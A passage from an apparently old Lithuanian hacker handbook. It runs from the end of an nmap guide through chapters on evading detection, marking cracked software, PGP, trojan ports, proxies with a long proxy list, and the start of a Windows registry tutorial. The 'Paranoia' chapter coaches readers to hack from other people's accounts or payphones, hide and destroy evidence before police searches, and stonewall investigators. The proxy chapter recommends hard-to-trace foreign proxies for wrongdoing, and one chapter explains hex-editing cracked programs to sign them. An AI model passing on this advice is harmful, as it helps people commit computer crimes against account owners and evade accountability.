libpcap’as yra taip pat platinamas kartu su nmap’u. Autorines teises į jį turi Van Jacobson, Craig Leres ir Steven McCanne, visi iš Lawrence Berkeley nacionalinės Laboratorijos Kalifornijos Universiteto, Berkeley, CA. Versija platinama su nmap’u gali būti perrašinėjama. Sour­ cus galit parsisiūsti iš ftp://ftp.ee.lbl.gov/libp­cap.tar.Z

PABAIGAI Džiaugiuosi, kad pagaliau pasiekėte galą. Dabar jau galite skaityti save kvalifikuotu nmap’o guru.

beje, jei norite ką nors pridėti ar pakeisti šiame doku­ mente, arba (neduok Dieve) radot kokių tai bug’u, rašykit man adresu, pateiktu sekcijoje išvertė. Šiaip šitas manu­ alas abejoju ar bus atnaujinamas, bet pačią naujausią nmap-lt-HOWTO visada galite rasti mano puslapyje:

http://ice.dammit.lt/~inner/

37. Paranoja arba kaip neikliuti

Prie ko cia ta paranoja? As zinau kas yra exploitas etc ir as galiu hakinti viska kas hakinasi. Neaaaaaaa. Su tokiu poziuriu toli nenueisi. Matai, px tie exploitai etc jei tave seka (klausosi telefono pokalbiu, skaito email etc), jei tavo kompas konfiskuotas arba netgi pats suimtas.Svarbiausia hakeriui ne zinoti daug exploitu etc, o buti nepagautam. Nes jei jau tave pagavo, tai tave gali ismesti is universiteto/darbo/mokyklos. Jei jau karta ikliuvai kaip hakeris, tai ir liksi su ta zyme likusi gyvenima. Ir kas svarbiausia: TU esi kaltas tol, kol kasnors neirodo priesingai. Adminui, kaip ir tau yra px istatymai (jis skiresi nuo taves tik tuo kad jo valdzioje yra servas), jei jis jau itare tave: skaitys tavo email, stebes tavo failus etc.

-=Taigi pateiksiu keleta metodu kaip neikliuti:=-

1. Visa mail`a sifruok PGP (jei nezinai kas tai tai suzinok).2. Visus savo failus sifruok.3. Laikyk visokius popierius (uzrasus etc) tol kol tikrai tau ju reikia. Visa kas nereikalinga sunaikink (sudegink etc, tik ne mesk i siuksline. Del ko? Skaityk apie trashinga).4. Visus duomenis nusikopijuok (ir uzsifruok) i kita laikmena (CD, ZIP, Hard`a etc). Laikyk juos kurnors kas nesusije su tavimi, hackingu. Taip neprarasi kratos metu savo duomenu ir siaip bus geras BackUP`as.5. Narsydamas www islik anoniminis. Kaip tai padaryti? Skaityk straipsni Proxy serveriai.6. Nehakink is savo linijos, savo acounto. Naudok svetimus acountus, eik i interneto svetaines (bus sunku arba net neimanoma atsekti), skambink is taksafono. 7. Atskiriems acountams, duomenims naudok vis kitus slaptazodzius. Taip suzinojus viena is ju maziau nukentesi.

Sis sarasas gali vis tesis ir testis. Atmink kad spionazui (taves sekimui) gali buti panaudota, tokia technika, kad net neitari ja esant. Pvz. pagal moniko skeidziamus spindulius galima sekti tavo moniko vaizda daugiau negu 100 m. atstumu, galima lazeriu pagalba sekti stiklo virpejima ir klausytis tavo pokalbiu, paspaudus klavisa isksiriamas tam tikras auksto daznio signalas pagal kuri galima sekti tavo klavisu paspaudimus ir daug daug kitu metodu.

Ka daryti jei jau esi itariamas? Net ir durniui aisku kad daba tave seks. Tad protingiausiai nusiraminti kol viskas praeis. Nesidometi hakingu, ispeti draugus kad nerasytu jokiu itartinu mail`u (PGP sifruota zinute taip pat kelia itarima), nesneketu apie nelegalia veikla telefonu. Taip pat reikia tiketis kratos, tad visa nelegale info, softa pasalink is savo buto/kompo. Ka veik si laika? Zaisk zaidimus, skaityk, tobulink savo programavimo igudzius etc.

-=Na o ka daryt ikliuvus?=-

1. Tuoj pat kreipkis i advokata. Jis turi pasistengti kad nebutu atliekama krata. Tai nedaug ka pades, bet sumazins ikalciu skaiciu, pasunkins teisesaugai tyrima etc. Parodyk, kad lengvai nepasiduosi.2. Nekalbek su mentais. Jei gali pasakyti bet ka, kad tu viska ispasakotum. Pvz.: kad paleis jei viska papasakosi. Taip nebuna, jei negali to padaryti. Tai gali tik prokuroras. Nieko mentams nepasakok, sakyk kad kalbi tik per advokata etc. Pats be kalbedamas gali netycia “susivartyti”, prasitarti etc.3. Tarkis su advokatu, kaip islipti is sito meslo.

Beto: neisduok savo darugu, kitu hakeriu etc. Visu pirma tu busi ozys, antra- gali prisidirbti dar daugiau (tu mani jei potos isdavystes apie tave nieko pasakyt nenores/negales).

Isvada:

-=NEIKLIUK, NEIKLIUK, NELEISK NET KAD TAVE ITARTU!!! TAPK PARANOJIKU!!! NEUZMIRS NIEKO KA CIA PERSKAITEI!!=-

38. Kaip Palikti Inicialus Nulauzhtoje Programoje

Jeigu jums sunku skaityti, tai yra reikia smaukty scrol bara apachioje(atiprashau uzh ishsireishkima:)) bet tinkamesnio zhodzhio nerada:) tada paspauskite EDIT ir isijunkite WORD WRAPaha na ir ka chia dabar jums pasakius, o gi tai kad manau kas bent kiek yra crackines (tikiuosi sekmingai:))) ir jei jam tai pavykdavo o jei dar ne, tai tikrai pavyks:) , tai vat vienu zhodzhiu kai nukrakini progse tai apima tarsi palaimos jausmas, tarsi pasidydzhiavimas, kad vat ash ja iveikiau, ash apejau ta prakeikta apsaugos sistema:) kuri ribojo mano veiksmus, taigi kaip parodyti kad butent tu nukrakinai ta ar kita progse, kitaip sakant kaip joje palikti inicialus, juk ir mes jau prie jos truputi prisidejome:)) argi ne?? o butu ish viso puiku jei tavo darba kazhkas prisiimtu sau. taigi viskas ko jums reikes tai papraschiausio hex editoriaus, na ash naudoju HIEW (visu papraschiausias naudojimui ish tu kuriuos ishbandzhiau ir manau geriausias:)) bet tai mano smeninis pozhiuris) taigi o kitas dalykas ko mums reikes tai papraschiausios hexines abeceles, na ash ja taip vadinu:

a-61 A-41 / – 2F Space – 00 or 20b-62 B-42 – 5C c-63 C-43 . – 2E d-64 D-44 – – 2De-65 E-45 : – 3Af-66 F-46 = – 3Dg-67 G-47 ? – 3Fh-68 H-48 ! – 21i-69 I-49 ” – 22 j-6A J-4A $ – 24k-6B K-4B % – 25l-6C L-4C & – 26m-6D M-4D ( – 28n-6E N-4E ) – 29o-6F O-4F 1 – 31p-70 P-50 2 – 32q-71 Q-51 3 – 33r-72 R-52 4 – 34s-73 S-53 5 – 35t-74 T-54 6 – 36u-75 U-55 7 – 37v-76 V-56 8 – 38w-77 W-57 9 – 39x-78 X-58 0 – 30y-79 Y-59 + – 2Bz-7A Z-5A * – 2A

taigi juk kiekvienoje programoje yra kokie nors zhodzhiai pavyzdzhiu visit our site ar kokiam ABOUT skirsnyje parashyta programos versija ir panashiai taigi atsidarome jau nukrakinta(nebutinai) programa hex editoriumi ir susirandame koki nors zhodi jei naudosite HIEW tai ishpardzhiu paspauskite F7 ir kur parashyta ASCII irashykite ieshkoma fraze , kuria jus noresite pakeisti. ir paspauskite ENTER. na ka kai rasite butent ta vieta kuria jus norite pakeisti neskubekite jos keisti textiniam rezhime, nes nieko jums nepavyks ir programa bus visishkai sugadinta, o juk mes nenorime kad taip atsitiktu:)(ypach jei i ja idejome tiek sunkaus darbo:)) taigi susiradome ta fraze kuria keisime ir tada spaudzhiame F4 ir pasirenkame HEX na jei naudojate kita hex editoriu tai nezhinau kur tai pasirinkti, bet viskas ko jums reikia tai susirasti ta fraze textiniame rezhime ir paskui viska pakeisti i HEXini rezhima. taigi matote kad viena raide tai du skaichiai taigi ir pazhvelkite i ta abcele kuria ash jums daviau kad kiekviena raide sudaryta is dvieju simboliu PVZ: zona zhodis bus:7A 6F 6E 61kur z=7A o=6F n=6E a=61

taigi jusu rasta fraze pakeite i hex rezhima ir keichiame tokiu budu bet nepersistenkite bekeisdami, kadangi jei virshisyte rastos frazes zhodzhiu simbolius bent vienu simboliu PVZ:jei ash norejau pakeisti LABAS i NELABAS tada programa nebeveiks, na vienu zhodzhiu reikia keisti i tiek pat simboliu PVZ:

jeigu noriu pakeisti fraze :MAIL to: zona@xxx.lt

taigi gali irashyti savo 19 simboliu, nes tarpas taip pat simbolis, taipogi galiu irashyti ir mazhiau MATOMU simboliu bet likusius turesiu tada uzhrashyti tarpais tai yra 00 arba 20 nes kaip sakau negalima keisti baitu skaichiaus.

PS:nepalikite originalaus kurejo ant ledo:)) nes tai Lamerishka visa garbe prisiimti sau tai ka shiam kartui tiek zhiniu:)

39. Trumpai apie PGP

Kas yra PGP?

PGP (Pretty Good Privacy ) yra vienas geriausiu sifravimo algoritmu, placiai naudojamas sifruojant email`a ir duomenis. PGP pagristas dvieju raktu- private ir public, autorizacija. t.y. duomenys sifruojami ir issifruojami dviem raktais, kuriu vienas yra viesas, o kitas privatus. Privatu rakta turi tik informacijos koduotojas ir tas kas ta informacija iskoduos.

Kokioms platformoms skirta PGP?

PGP sifratoriu/desifratoriu yra beveik visoms operacinems sistemoms: MS-DOS WINDOWS UNIX/LINUX VAX/VMS BeOS Windows sistemai populeriausia PGP programa yra WinPGP, bei pasto programa The Bat. Linux sistemoje naudojama gpg. Email programa palaikanti PGP- mutt

Kur dar pritaikoma PGP?

PGP pritaikoma tikrinti distribuciju legaluma/tikruma. PVZ. Red Hat rpm paketu originalumas patikrinamas PGP metodu (check PGP signature).

Populiariausiu trojanu portai

Trojano vardas : – Portas – The tHing 6400 NetBus 1.x 1234512346 NetBus Pro 20034 BackOriffice 31337 SubSeven 1243 NetSphere 30100 Deep Throat 1,2,3.x 6670 Master Paradise 31 Silencer 1001 Millenium 20000 Devil 1.03 65000 NetMonitor 7306 Streaming Audio Trojan 1170 Socket23 30303 GatecrasherNet Control (added 10/05/00) 6969 Telecommando 61466 Gjamer 12076 IcqTrojen 4950 Priotrity 16969 Vodoo 1245 Wincrash 5742 Wincrash2 2583 Netspy 1033 ShockRave 1981 Stealth Spy 555 Pass Ripper 2023 Attack FTP 666 GirlFriend 21554 Fore, Schwindler 50766 Tiny Telnet Server 34324 Kuang 30999 Senna Spy Trojans 11000 WhackJob 23456 Phase0 555 BladeRunner 5400 IcqTrojan 4950 InIkiller 9989 PortalOfDoom 9872 ProgenicTrojan 11223 Prosiak 0.47 22222 RemoteWindowsShutdown 53001 RoboHack 5569 Silencer 1001 Striker 2565 TheSpy 40412 TrojanCow 2001 UglyFtp 23456 WebEx 1001 Backdoor 1999 Phineas 2801 Psyber Streaming Server 1509 Indoctrination 6939 Hackers Paradise 456 Doly Trojan 1011 FTP99CMP 1492 Shiva Burka 1600 Remote Windows Shutdown 53001 BigGluck, aka TN in our archive 34324 NetSpy DK 31339 Hack´99 KeyLogger 12223 iNi-Killer 9989 ICQKiller 7789 Portal of Doom 9875 Firehotcker 5321 Master Paradise 40423 BO jammerkillahV 121 AOLTrojan1.1 30029 Hack’a’tack 31787 The Invasor 2140 SpySender 1807 The Unexplained 29891 Bla 20331 FileNail 4567 ShitHeep 69123 Coma 10607 Bla1.1 1042 HVL Rat5 2283 BackConstruction1.2 5400 Kuang2 theVirus 17300 Xtcp 2.00 + 2.01 5550 Schwindler 1.82 21554 Doly trojan v1.35 1010 Doly trojan v1.5 1015 Wingate (Socks-Proxy) 1080 Vampire 6669 DeltaSource 6883 Trojan Spirit 2001 33911 Maverick’s Matrix 1.2 – 2.0 1269 2025

1025

Total Eclypse 1.0 3791 OOTLT + OOTLT Cart 5011 Eclipse 2000 12701 NetMetro 1.0 5031 Illusion Mailer 5521 InCommand 1.0 + 1.3 + 1.4 07/01/00) 940010291029 NeTadmin 555 Logged! 20203 Shitheep 6912 Schoolbus 1.6 54321 Schoolbus 2.0 Chupacabra 20203 TheThing 1.6 6000 AimSpy 777 NetMetropolitan 1.04 50325031 Transcout 1.1 + 1.2 1999 SoftWar 1207 Ambush 10666 Der Spaeher 3 Insane Network 2000200110001001 The Prayer 1.2 + 1.3 99992716 Host Control 1.0 666911050 Yet Another Trojan 37651 NetRaider 57341 TCPShell.c 6666 PC Crasher 56375638 Mini Command 1.2 1050 Mosucker 16484 Rat 1.2 29892989 FakeFTP 1966 Intruse Pack 1.27b 30947 Snid X2 3586 7609 1784 Freak 88 7001 Asylium 0.1&0.11&0.12&0.13 23432 Prosiak 4444423 (telnet option) Traitor 2.1 SSFS 1.0 21 Connection 60411 Host Control 2.6 10528 11051 15092 7424 7424 BIONET 12349 Rux.PSW 2208 CrazyNet 17490 17500

40. Proxy

Proxy serveriu naudojimas arba anonimiskumas narsant Kiekviena syki kai jus narsote www, jusu vizitas gali buti loginamas. Viskas: jusu IP, jusu narsykle, OS, ekrano rezoliucija, netgi tai is kur atejote.Aisku yra grupes zmoniu kuriems tai nepatinka. Taip aisku dazniausiai ir ikliuna ar kitaip prisidirba zmones. Pvz.: kai BTV zurnalistas atskleide zmogzudyste ir apie ja imete i www.btv.lt, VSD (valstybes saugumo departamentas) susirupino, mat ta zmogzudyste buvo valstybine paslaptis ir konfiskavo serva su visais logais, tai yra su visa info kas mate si puslapi. Tai va ar jums patiktu jei viena diena ateitu pas jus kazkas (kad ir VSD) ir vien del to, kad jus apsilankete vienam ar kitam www puslapyje.

Yra keletas budu, kaip nuo to apsisaugoti, kaip likti anonimiskam. Vienas is ju yra moketi bapkes kazkokiom firmom kurios tuo rupinasi (tave anonimizuoja), arba kita- naudoti (kaip jus ir spejate) proxy serverius.

Kaip tai padaryti? O gi sukonfiguruoji savo narsykle ir viskas: Ant Netscape – edit->preferences->advanced->proxy->manual proxy configuration ir spausti View. Atsiradus dialogo lentelei uzrasyti proxy serveri ir porta. Ant Internet Explorer- tools->internet option->conection-> lan setings. Nurodant proxy serveri reike nurodyti ir porta. Dazniausiai naudojami 80 ir 8080 portai.

Taip pat kai kurie download saitai leidzia parsisiusti progses tik, tarkim, USA gyventojams, o jus norite butent parsisiusti progse is to saito. Iseitis: susirandi USA proxy ir ji naudoji.

Kaip rasti proxy serveriu adresus? Galima ieskoti kokiu ju listu arba bandyti paciam speti. Patikrinti ar toks proxy egzistuoja galime taip:ping proxy.koks-nors-provaideris.net Jeigu jus gausite atsakyma kaip pvz. “Bad IP”, vadinasi shiame serve proxy nera, bet jeigu pasirodys ICMP echo, ko gero, jus radote tai, ko ieshkojote. Provaideriu sarashus galite gauti darant paieshka ivairiose paieshkos stotyse (yahoo.com, altavista.digital.com, etc.) “ISP list” tema.

Bet is tikro proxy servai anonimiskumo negarantuoja. Jai jus padarysite ka nors blogo, tai auka (arba istatymo sergetojai) gali paprasyti proxy serverio admino, kad duotu jusu ip. Patarimas: jei ka bloga darysit, naudokit kokius kinietiskus ar pan. proxy servus, nes is ju bus sunkiau isgauti info. Beje galima proxy jungti i grandines. Kaip tai padaryt naudojant Netscape? Reikia nueiti edit->preferences->advanced->proxy->manual proxy configuration ir rasyti proxy serverius taip: proxy1.dom:port//proxy2.dom:port//proxy3.dom:port ir pan. Primenu kad kuo daugiau proxy servu naudosit tuo daugiau kris jusu ineto rysys.

Kaip veikia proxy servai?

Tau uzrasius url, adresas perduodamas proxy servui. Jis savo ruoztu nueina ten ir parsiuncia visa puslapi (arba jama is vietinio cashe katalogo), kuri meta tau. Tad is tikro ne tu ateini i norima url, o proxy serveris. Tad loginama proxy servo IP, o ne tavo.

41. Proxy Adresai

Proxy serveriu adresaiCia pateikiu proxy serveriu adresu (jie, kaip matote, pateikti abeceles tvarka). Pastaba: gali atsitikti taip, kad nurodytas netinkamas proxy serverio portas. Tuomet bandykite visus standartinius proxy portus: 80, 3128, 8080.

-=ARPA – ARPANET=-227.11.58.209.in-addr.arpa 8066.216.50.207.in-addr.arpa 8081.98.178.204.in-addr.arpa 8082.192.16.12.in-addr.arpa 80

-=AR – ARGENTINA=-noc.uncu.edu.ar 8080

-=AT – AUSTRIA=-aphrodite.iaccess.com.au 80aplan.dnb.com.au 80core1-s242-2.centris.net.au 80fewalker.ozemail.com.au 80firewall.brim.vic.gov.au 80hutsg7p49.hutch.com.au 80hutsg9p2.hutch.com.au 8080jethro.meriden.pas.com.au 80kalima.ozemail.com.au 80mail.coolmore.com.au 80mel.proxy.ozemail.com.au 80nordex.ozemail.com.au 80phoenix.bushnet.qld.edu.au 80203.28.209.34 80pluto.netlinkwa.com.au 80202.61.216.2 80staff.netlinkwa.com.au 80proxy.hutch.com.au 80proxy.library.uq.edu.au 80proxy.primus.com.au 80sas.netcam.com.au 80server1.cgs.com.au 80sydexc2.tmpw.com.au 80tdone.tudogs.net.au 80wacka11.wackado.com.au 80www2.transport.tas.gov.au 80

-=CA – CANADA=-httpproxy.math.uwaterloo.ca 80nd253.notredame.sk.ca 80pc252.ldss.avonmaitland.on.ca 80pr1.nbed.nb.ca 80pr2.nbed.nb.ca 80pr3.nbed.nb.ca 80pr4.nbed.nb.ca 80wsd.inet.quill-lake.sk.ca 80

-=CZ – CZECH REPUBLIC=-bg.pcdir.cz 80inet01.cabletel.cz 80

-=COM – COMMERCIAL=-194.72.124.13 80202.96.134.165 8080agatlmis01.atl.agcocorp.com 80anon-sol.free.anonymizer.com 80asb-hou02.axsia.com 80bbs.packardbell.com 80beachboy.kajen.com 8080berk.com 8080blaze.syncsort.com 80cacheflow-1.fwi.com 80cacheflow-1.fwi.com 8080cacheflow01.ripnet.com 80cadworld.com 80chacal.msage.com 80d058656.sce.com 80dym.com 80eaglent.cemexusa.com 80eilat.gambit.com 80filter.burgoyne.com 3128ftp.sylvania.com 80gatekeeper.imall.com 80gateway.hro.com 8080imsp085.netvigator.com 80imsp087.netvigator.com 80inktomi.efortress.com 80internet-gw1.hea.com 80invis-ascella.free.anonymizer.com 80invis-sirrah.free.anonymizer.com 80ipfilter.hknet.com 80mail.eg.blommer.com 80mail.immgmt.com 80mail.itdynamics.com 80melnc01.bigpond.com 80prefetch-atm.nycap.rr.com 8080proxy-east1.get2net.com 80proxy01.dbn.iafrica.com 80proxye3-atm.maine.rr.com 8080proxye4-atm.maine.rr.com 8080raistlin.carinthia.co.at 80sabatini.bestnet.com 80sgsst.com 80smtpgw.national-city.com 80sydnc01.bigpond.com 80tibinc.com 80titan.datainternet.com 8080virtual-domains.flash.net 8080webcache.us.newbridge.com 80worf-gw.calspan.com 80

www.intwebservice.com 80

-=DE – GERMANY=-etecs5.uni-duisburg.de 80fhdo2.dvz.fh-dortmund.de 80hdihp2-f.fzk.de 80nor1s005.jungheinrich.de 80p3.uhlencom.de 803.97.243.195.in-addr.arpa 80rena.zfn.uni-bremen.de 3128ultra1b.noc.fh-aachen.de 3128

-=DK – DENMARK=-linsrv0.staff.kvl.dk 80

-=EDU – EDUCATIONAL=-bogachiel.evergreen.edu 8080hawkmoon.northwood.edu 8080liberty.uc.wlu.edu 80rhino.evansville.edu 80vanguard.vg.pdx.edu 80www.samford.edu 8080zeus.fiu.edu 8080

-=ES – SPAIN=-atenea.uax.es 80

-=FI – FINLAND=-dlc.fi 80

-=FR – FRANCE=-cache-web.grenet.fr 80proxycf1.grolier.fr 80proxycf1.grolier.fr 8080

-=HR – CROATIA=-gita.srce.hr 80

-=IS – ICELAND=-nafni.skyggnir.is 80ns0.ok.is 80helios.vortex.is 80

-=IT – ITALY=-dns.lcnet.it 8080proxy.micanet.it 80

-=JP – JAPAN=-

cairo.osu.ac.jp 8080cs.oita-med.ac.jp 80hanshin.koshien-c.ac.jp 80kpcu.kumamoto-pct.ac.jp 8080ns.nagano-kentan.ac.jp 8080ns40c.mis.ous.ac.jp 8080proxy.baiko.ac.jp 80sakpro.eiyo.ac.jp 80sugagw.ci.noda.sut.ac.jp 80ebisu04.ebisu.ad.jp 8080denntr01.sunwa.co.jp 8080dns1.infocom.co.jp 80dns1.k-sn.co.jp 80dtsgate.dotshell.co.jp 80halgw.hallab.co.jp 80inet-sv.zenon.co.jp 8080ips-gw.ymdchem.co.jp 8080nis-in.nara-js.co.jp 80ns.hayashikk.co.jp 80ns.matsugc.co.jp 8080ns.sanshusha.co.jp 80ns0.apecs.co.jp 8080www.nidec.co.jp 8080segw.seng.co.jp 80sekigate_e.sekitech.co.jp 8080svtyo04f.nrsgroup.co.jp 80topgun.polymatech.co.jp 8080www.housefoods.co.jp 80www.apel.ne.jp 8080dns.jicnet.or.jp 8080kuramoto.miyamizu.or.jp 8080ns1.shokokai-nagasaki.or.jp 8080www.health-net.or.jp 8080www.ink.or.jp 8080kusu.city.kurume.fukuoka.jp 8080ns.nousi.pref.okinawa.jp 80ns.ntts.mihama.chiba.jp 8080watson.ysp.pref.yamaguchi.jp 8080apty.rcb.gr.jp 8080

-=KR – KOREA=-biho.taegu.ac.kr 8080cache2.kornet.nm.kr 80cvs2.kyunghee.ac.kr 8080www.hanilgroup.co.kr 8080proxy.chungnam.ac.kr 8080

-=LT- LITHUANIJA=-proxy.5ci.lt 80proxy.is.lt 80

-=MIL – US Military=-onion-router.nrl.navy.mil 9200onion-router.nrl.navy.mil 9200

-=NET – NETWORK=-205-219-79-148.bayarea.net 8080alpha1.excell.net 8080tomato.ulcc.wwwcache.ja.net 8080beginners.net 80bos2-wc1.atlas.digex.net 80bos2-wc2.atlas.digex.net 80bradpst.bayarea.net 80bread.mcc.wwwcache.ja.net 8080cache-1.ftsm.ipa.net 80cache-1.jopl.ipa.net 80cache-e0.hom.net 80cache1.sntc01.pacbell.net 80cachef.citytel.net 80cacheflow.bright.net 80cacheflow.insync.net 80cacheflow2.mpinet.net 80cachesrv.1st.net 80garlic.mcc.wwwcache.ja.net 8080concord01.pop.internex.net 8080dca1-wc1.atlas.digex.net 80dca1-wc1.atlas.digex.net 8080dca1-wc2.atlas.digex.net 80dca1-wc2.atlas.digex.net 8080dead.mcc.wwwcache.ja.net 8080dynacache.ultra.net 80elpxy01.ce.mediaone.net 8080ginger.mcc.wwwcache.ja.ne 8080hamster.slip.net 8080holtcompanies.com 80korma.connect-2.net 80kraken.telstra.net 3128lhsa-proxy.shutter.net 80loxppp6-sp5.suapha.loxinfo.net 80loxppp67-usr.suapha.loxinfo.net 80loxppp8-sp10.suapha.loxinfo.net 80loxusr1.suapha.loxinfo.net 80magic.brasilnet.net 80mail.startec.net 80markpt.hom.net 80oregano.ulcc.wwwcache.ja.net 8080munti.i-next.net 80netcache.apk.net 80nexus-1.flash.net 8080nexus-2.flash.net 8080ns.egyptian.net 8080ns.htc.net 8080ns1.isol.net 80oproxy.cvzoom.net 80pasco.se.mediaone.net 8080pepper.mcc.wwwcache.ja.net 8080pm3-1-user-39.mgv.hom.net 80polk.se.mediaone.net 8080proxy.elkgrove.net 80119.63.170.206.in-addr.arpa 80cacheflow.golden.net 3000cacheflow.golden.net 80proxy.touch.net 80q.netunlimited.net 80salt.mcc.wwwcache.ja.net 8080server1.bisnet.net 80sjc4-wc1.atlas.digex.net 80sjc4-wc1.atlas.digex.net 8080smfcache-1.jps.net 80sun.hallertau-online.net 80theseus.mcc.wwwcache.ja.net 8080virtual-domains.flash.net 8080waltz.rahul.net 80

-=NL – NETHERLANDS=-hades.hro.nl 8080webproxy.gelrevision.nl 80

-=NO – NORWAY=-alpha1.hnett.no 8080

-=NZ – NEWZEALAND=-graeme1.iprolink.co.nz 80www.progress.co.nz 80

-=ORG – ORGANIZATION=-gw.waaa.org 80mail.archdiocese-no.org 80

-=PH – PHILIPPINES=-electron2.msc.net.ph 3128

-=PL – POLAND=-sunsite.icm.edu.pl 8080

-=PT – PORTUGAL=-beta.di.uminho.pt 80leonardo.isec.pt 8080socks.isec.pt 8080194.65.52.252 8080

-=QT – QUATAR=-proxy1.qatar.net.qa 8080

-=RU – RUSSIA=-adam.rosinkas.ru 80

-=SE – SWEDEN=-www.sls.se 8080

-=SG – SINGAPORE=-proxy1.tp.ac.sg 80inet.gatxterminals.com.sg 8080

-=TH – THAILAND=-netcache.loxinfo.co.th 80proxy.rsu.ac.th 8080swallow.cat.net.th 8080proxy2.rsu.ac.th 8080

-=TW – TAIWAN=-c1.h202052106.is.net.tw 80club.golden.com.tw 8080server.928.com.tw 3128www.cisc.iii.org.tw 8080www.ecs.com.tw 80

-=UK – UNITED KINGDOM=-horatio.cre.canon.co.uk 8080softy.poptel.org.uk 8080ns0.mistral.co.uk 3128thingy.eng.abdn.ac.uk 80webcache18a.cache.pol.co.uk 80webcache18b.cache.pol.co.uk 80webcache21a.cache.pol.co.uk 80webcache21b.cache.pol.co.uk 80webcache22a.cache.pol.co.uk 80webcache22b.cache.pol.co.uk 80webcache23a.cache.pol.co.uk 80webcache23b.cache.pol.co.uk 80webcache24a.cache.pol.co.uk 80webcache24b.cache.pol.co.uk 80webcache25a.cache.pol.co.uk 80webcache25b.cache.pol.co.uk 80webcache26a.cache.pol.co.uk 80webcache26b.cache.pol.co.uk 80webcachew01a.cache.pol.co.uk 80webcachew01b.cache.pol.co.uk 80webcachew02a.cache.pol.co.uk 80webcachew02b.cache.pol.co.uk 80webcachew03a.cache.pol.co.uk 80webcachew03b.cache.pol.co.uk 80webcachew04a.cache.pol.co.uk 80webcachew04b.cache.pol.co.uk 80webcachew05a.cache.pol.co.uk 80webcachew05b.cache.pol.co.uk 80webcachew06a.cache.pol.co.uk 80webcachew06b.cache.pol.co.uk 80webcachew07a.cache.pol.co.uk 80webcachew07b.cache.pol.co.uk 80webcache05b.cache.pol.co.uk 80webcache06b.cache.pol.co.uk 80webcache01b.cache.pol.co.uk 80webcache02b.cache.pol.co.uk 80webcache04b.cache.pol.co.uk 80

-=US – UNITED STATES=-cache.manistee-isd.k12.mi.us 81ci.blue-springs.mo.us 80dcs.dexter.k12.mi.us 80hal.calc.k12.la.us 8080koa.iolani.honolulu.hi.us 80mcoeftp.marin.k12.ca.us 80numbers.tvcc.cc.or.us 80oakweb.oak-web.washington-ch.oh.u 8080pc103.portage.k12.mi.us 80proxy1.cdesd.k12.or.us 80proxy2.prescott.guilford.k12.nc.us 80thor.ircc.cc.fl.us 80watcher.state.wy.us 80proxy1.prescott.guilford.k12.nc.us 80www.cassvillesd.k12.wi.us 80

-=VE – VENEZUELA=-proxy.telcel.net.ve 80

-=ZA – SOUTH AFRICA=-cache.mailnet.co.za 80ns2.quickvoice.co.za 80proxy-rnb2.mweb.co.za 80proxy.cpt.mweb.co.za 80proxy.pta.mweb.co.za 80

-=ZW – ZIMBABWE=-proxy.africaonline.co.zw 8080

-=IP – Servers listed by IP=-12.7.130.33 8080142.169.242.4 80164.124.250.226 80165.138.113.102 8080165.138.113.221 8080165.138.113.247 8080165.138.94.10 8080165.254.186.2 8080168.126.72.10 8012.7.130.33 8080142.169.242.4 80164.124.250.226 80165.138.113.102 8080165.138.113.221 8080165.138.113.247 8080165.138.94.10 8080165.254.186.2 8080168.126.72.10 80168.126.72.12 80168.126.72.13 80168.126.72.26 80168.216.147.130 80169.133.1.51 80192.117.238.94 80193.89.27.199 80194.133.122.44 8080194.140.17.130 80194.213.91.6 80194.239.178.252 80194.51.96.231 8080195.37.223.225 80195.74.0.28 80198.161.26.2 80198.161.26.33 80198.161.26.65 80199.172.226.197 8080200.1.161.59 80202.235.15.34 8080202.30.245.3 80202.39.143.5 80203.103.174.194 80203.108.181.62 80203.144.250.66 80203.241.162.32 80203.37.184.60 80203.41.7.130 80204.140.188.5 80204.211.154.142 80204.211.154.144 80205.134.211.44 80208.196.150.4 80209.121.142.2 80209.20.42.6 3128209.5.107.10 80210.172.76.30 80210.8.56.1 80210.96.52.1 80

42. REGISTRAS

Taigi pradedame:

Kaip jus tikriausiai jau zhinote registre visos Windows programos (net ir patys windowsai) ishsaugo savo kaikuriuos parametrus. Tachiau, kaip tos programos juos ishsaugo ???

Taigi shiame darbe ash norechiau aprashyti registro programavimo pagrindus. Stengiausi laikitys atokiau nuo tokio zhargonizmo kaijp joos rashotie laijshkuoze ir pan =:). Stengiausi, kad shis darbas butu kuo daugiau mokslinio pobudzhio.

Disklaimeris: Shi teksta parashiau grynai mokomaisiais tikslais ir neprisiimu jokios atsakomybes, jeigu naudojant shia literatura nors vienas zhmogus patirs moraliniu ar materialiniu nuostoliu.

Shis failas gali buti laisvai platinamas iki tol, kol kartu su juo bus minimas autoriaus vardas, bei jis liks nepakeistas.Achiu.

Turinys:

1. Registras, jo struktura.2. Pagrindiniai registro skyriai ( HKEYS ) ir ka jie reishkia.3. Registro irashu tipai ( String, DWord, Binary ).4. Pradedame programuoti ( Su Delphi 5 ).5. Idomesnes registro vientos ( ten kur jus hackeriai galesite pridergti lamoms =:)

1 Registras, jo struktura.

Registras laiko duomenis hierachinio tipo “medyje” (tree). Kiekviena “shakele” medyje yra vadinama “raktu” (key). Kiekvienas toks raktas gali savyje tureti dar po kelis “raktus” arba tureti “irashus” (vadinamus “values”). Kartais netgi vien “rakto” buvimas tam tikroje vietoje yra visa informacija kuria reikia pasiimti programai; kita karta, programa atidaro tam tikra rakta ir pasiima informacija ish irashu esanchiu tame rakte. Vienas raktas gali tureti neribojama kieki irashu, ir irashas gali tureti bet kokia reikshme.

2 Pagrindiniai registro skyriai ( HKEYS ) ir ka jei reishkia.

Turbut pastebejote kaireje registro lango puseje yra 6 didelemis raidemis pavaidnti skyriai ir visi jie prasideda 4 raidemis HKEY_…. na tai patys aukshchiausieji registro hierarchijos skyriai (neiskaitykite My Computer, nes jame nera nieko irashyta). Kiekvienas ish ju turi savo paskirti registr, kiekviename ish ju saugoma tam tikra informacija: viename programos saugo savo nustatymus, kitame sistema (Windows), dar kitame vartotojo nustatymai ir t.t. ir pan.Taigi chia rashoma, ka kiekvienas skyrius reishkia ir ka jis savyje “saugo”:

HKEY_CLASSES_ROOT: Shiame skyriuje yra saugomi dokumentu tipai (arba klases) ir tu dokumentu savybes susijusios su tu dokumentu tipais. Taip pat nustatymai saugomi shiame skyriuje yra naudojami Windows programu be OLE programu (gal kas nors man parashykite ka tai reishkia).

HKEY_CURRENT_USER: Shiame skyriuje yra saugomi konkretaus vartotojo nustatymai. Shie nustatymai taip pat iskaito ir Windows shell’o kintamuosius, irashus apie programu grupes, splavas, spausdintuvus, tinklo sujungimus, ir programu nustatymus.

HKEY_LOCAL_MACHINE: Shis skyrius saugo fizine kompo bukle, iskaitant duomenis apie kompo magistrale, sistemine atminti, bei instaliuota hardwara ir softwara.

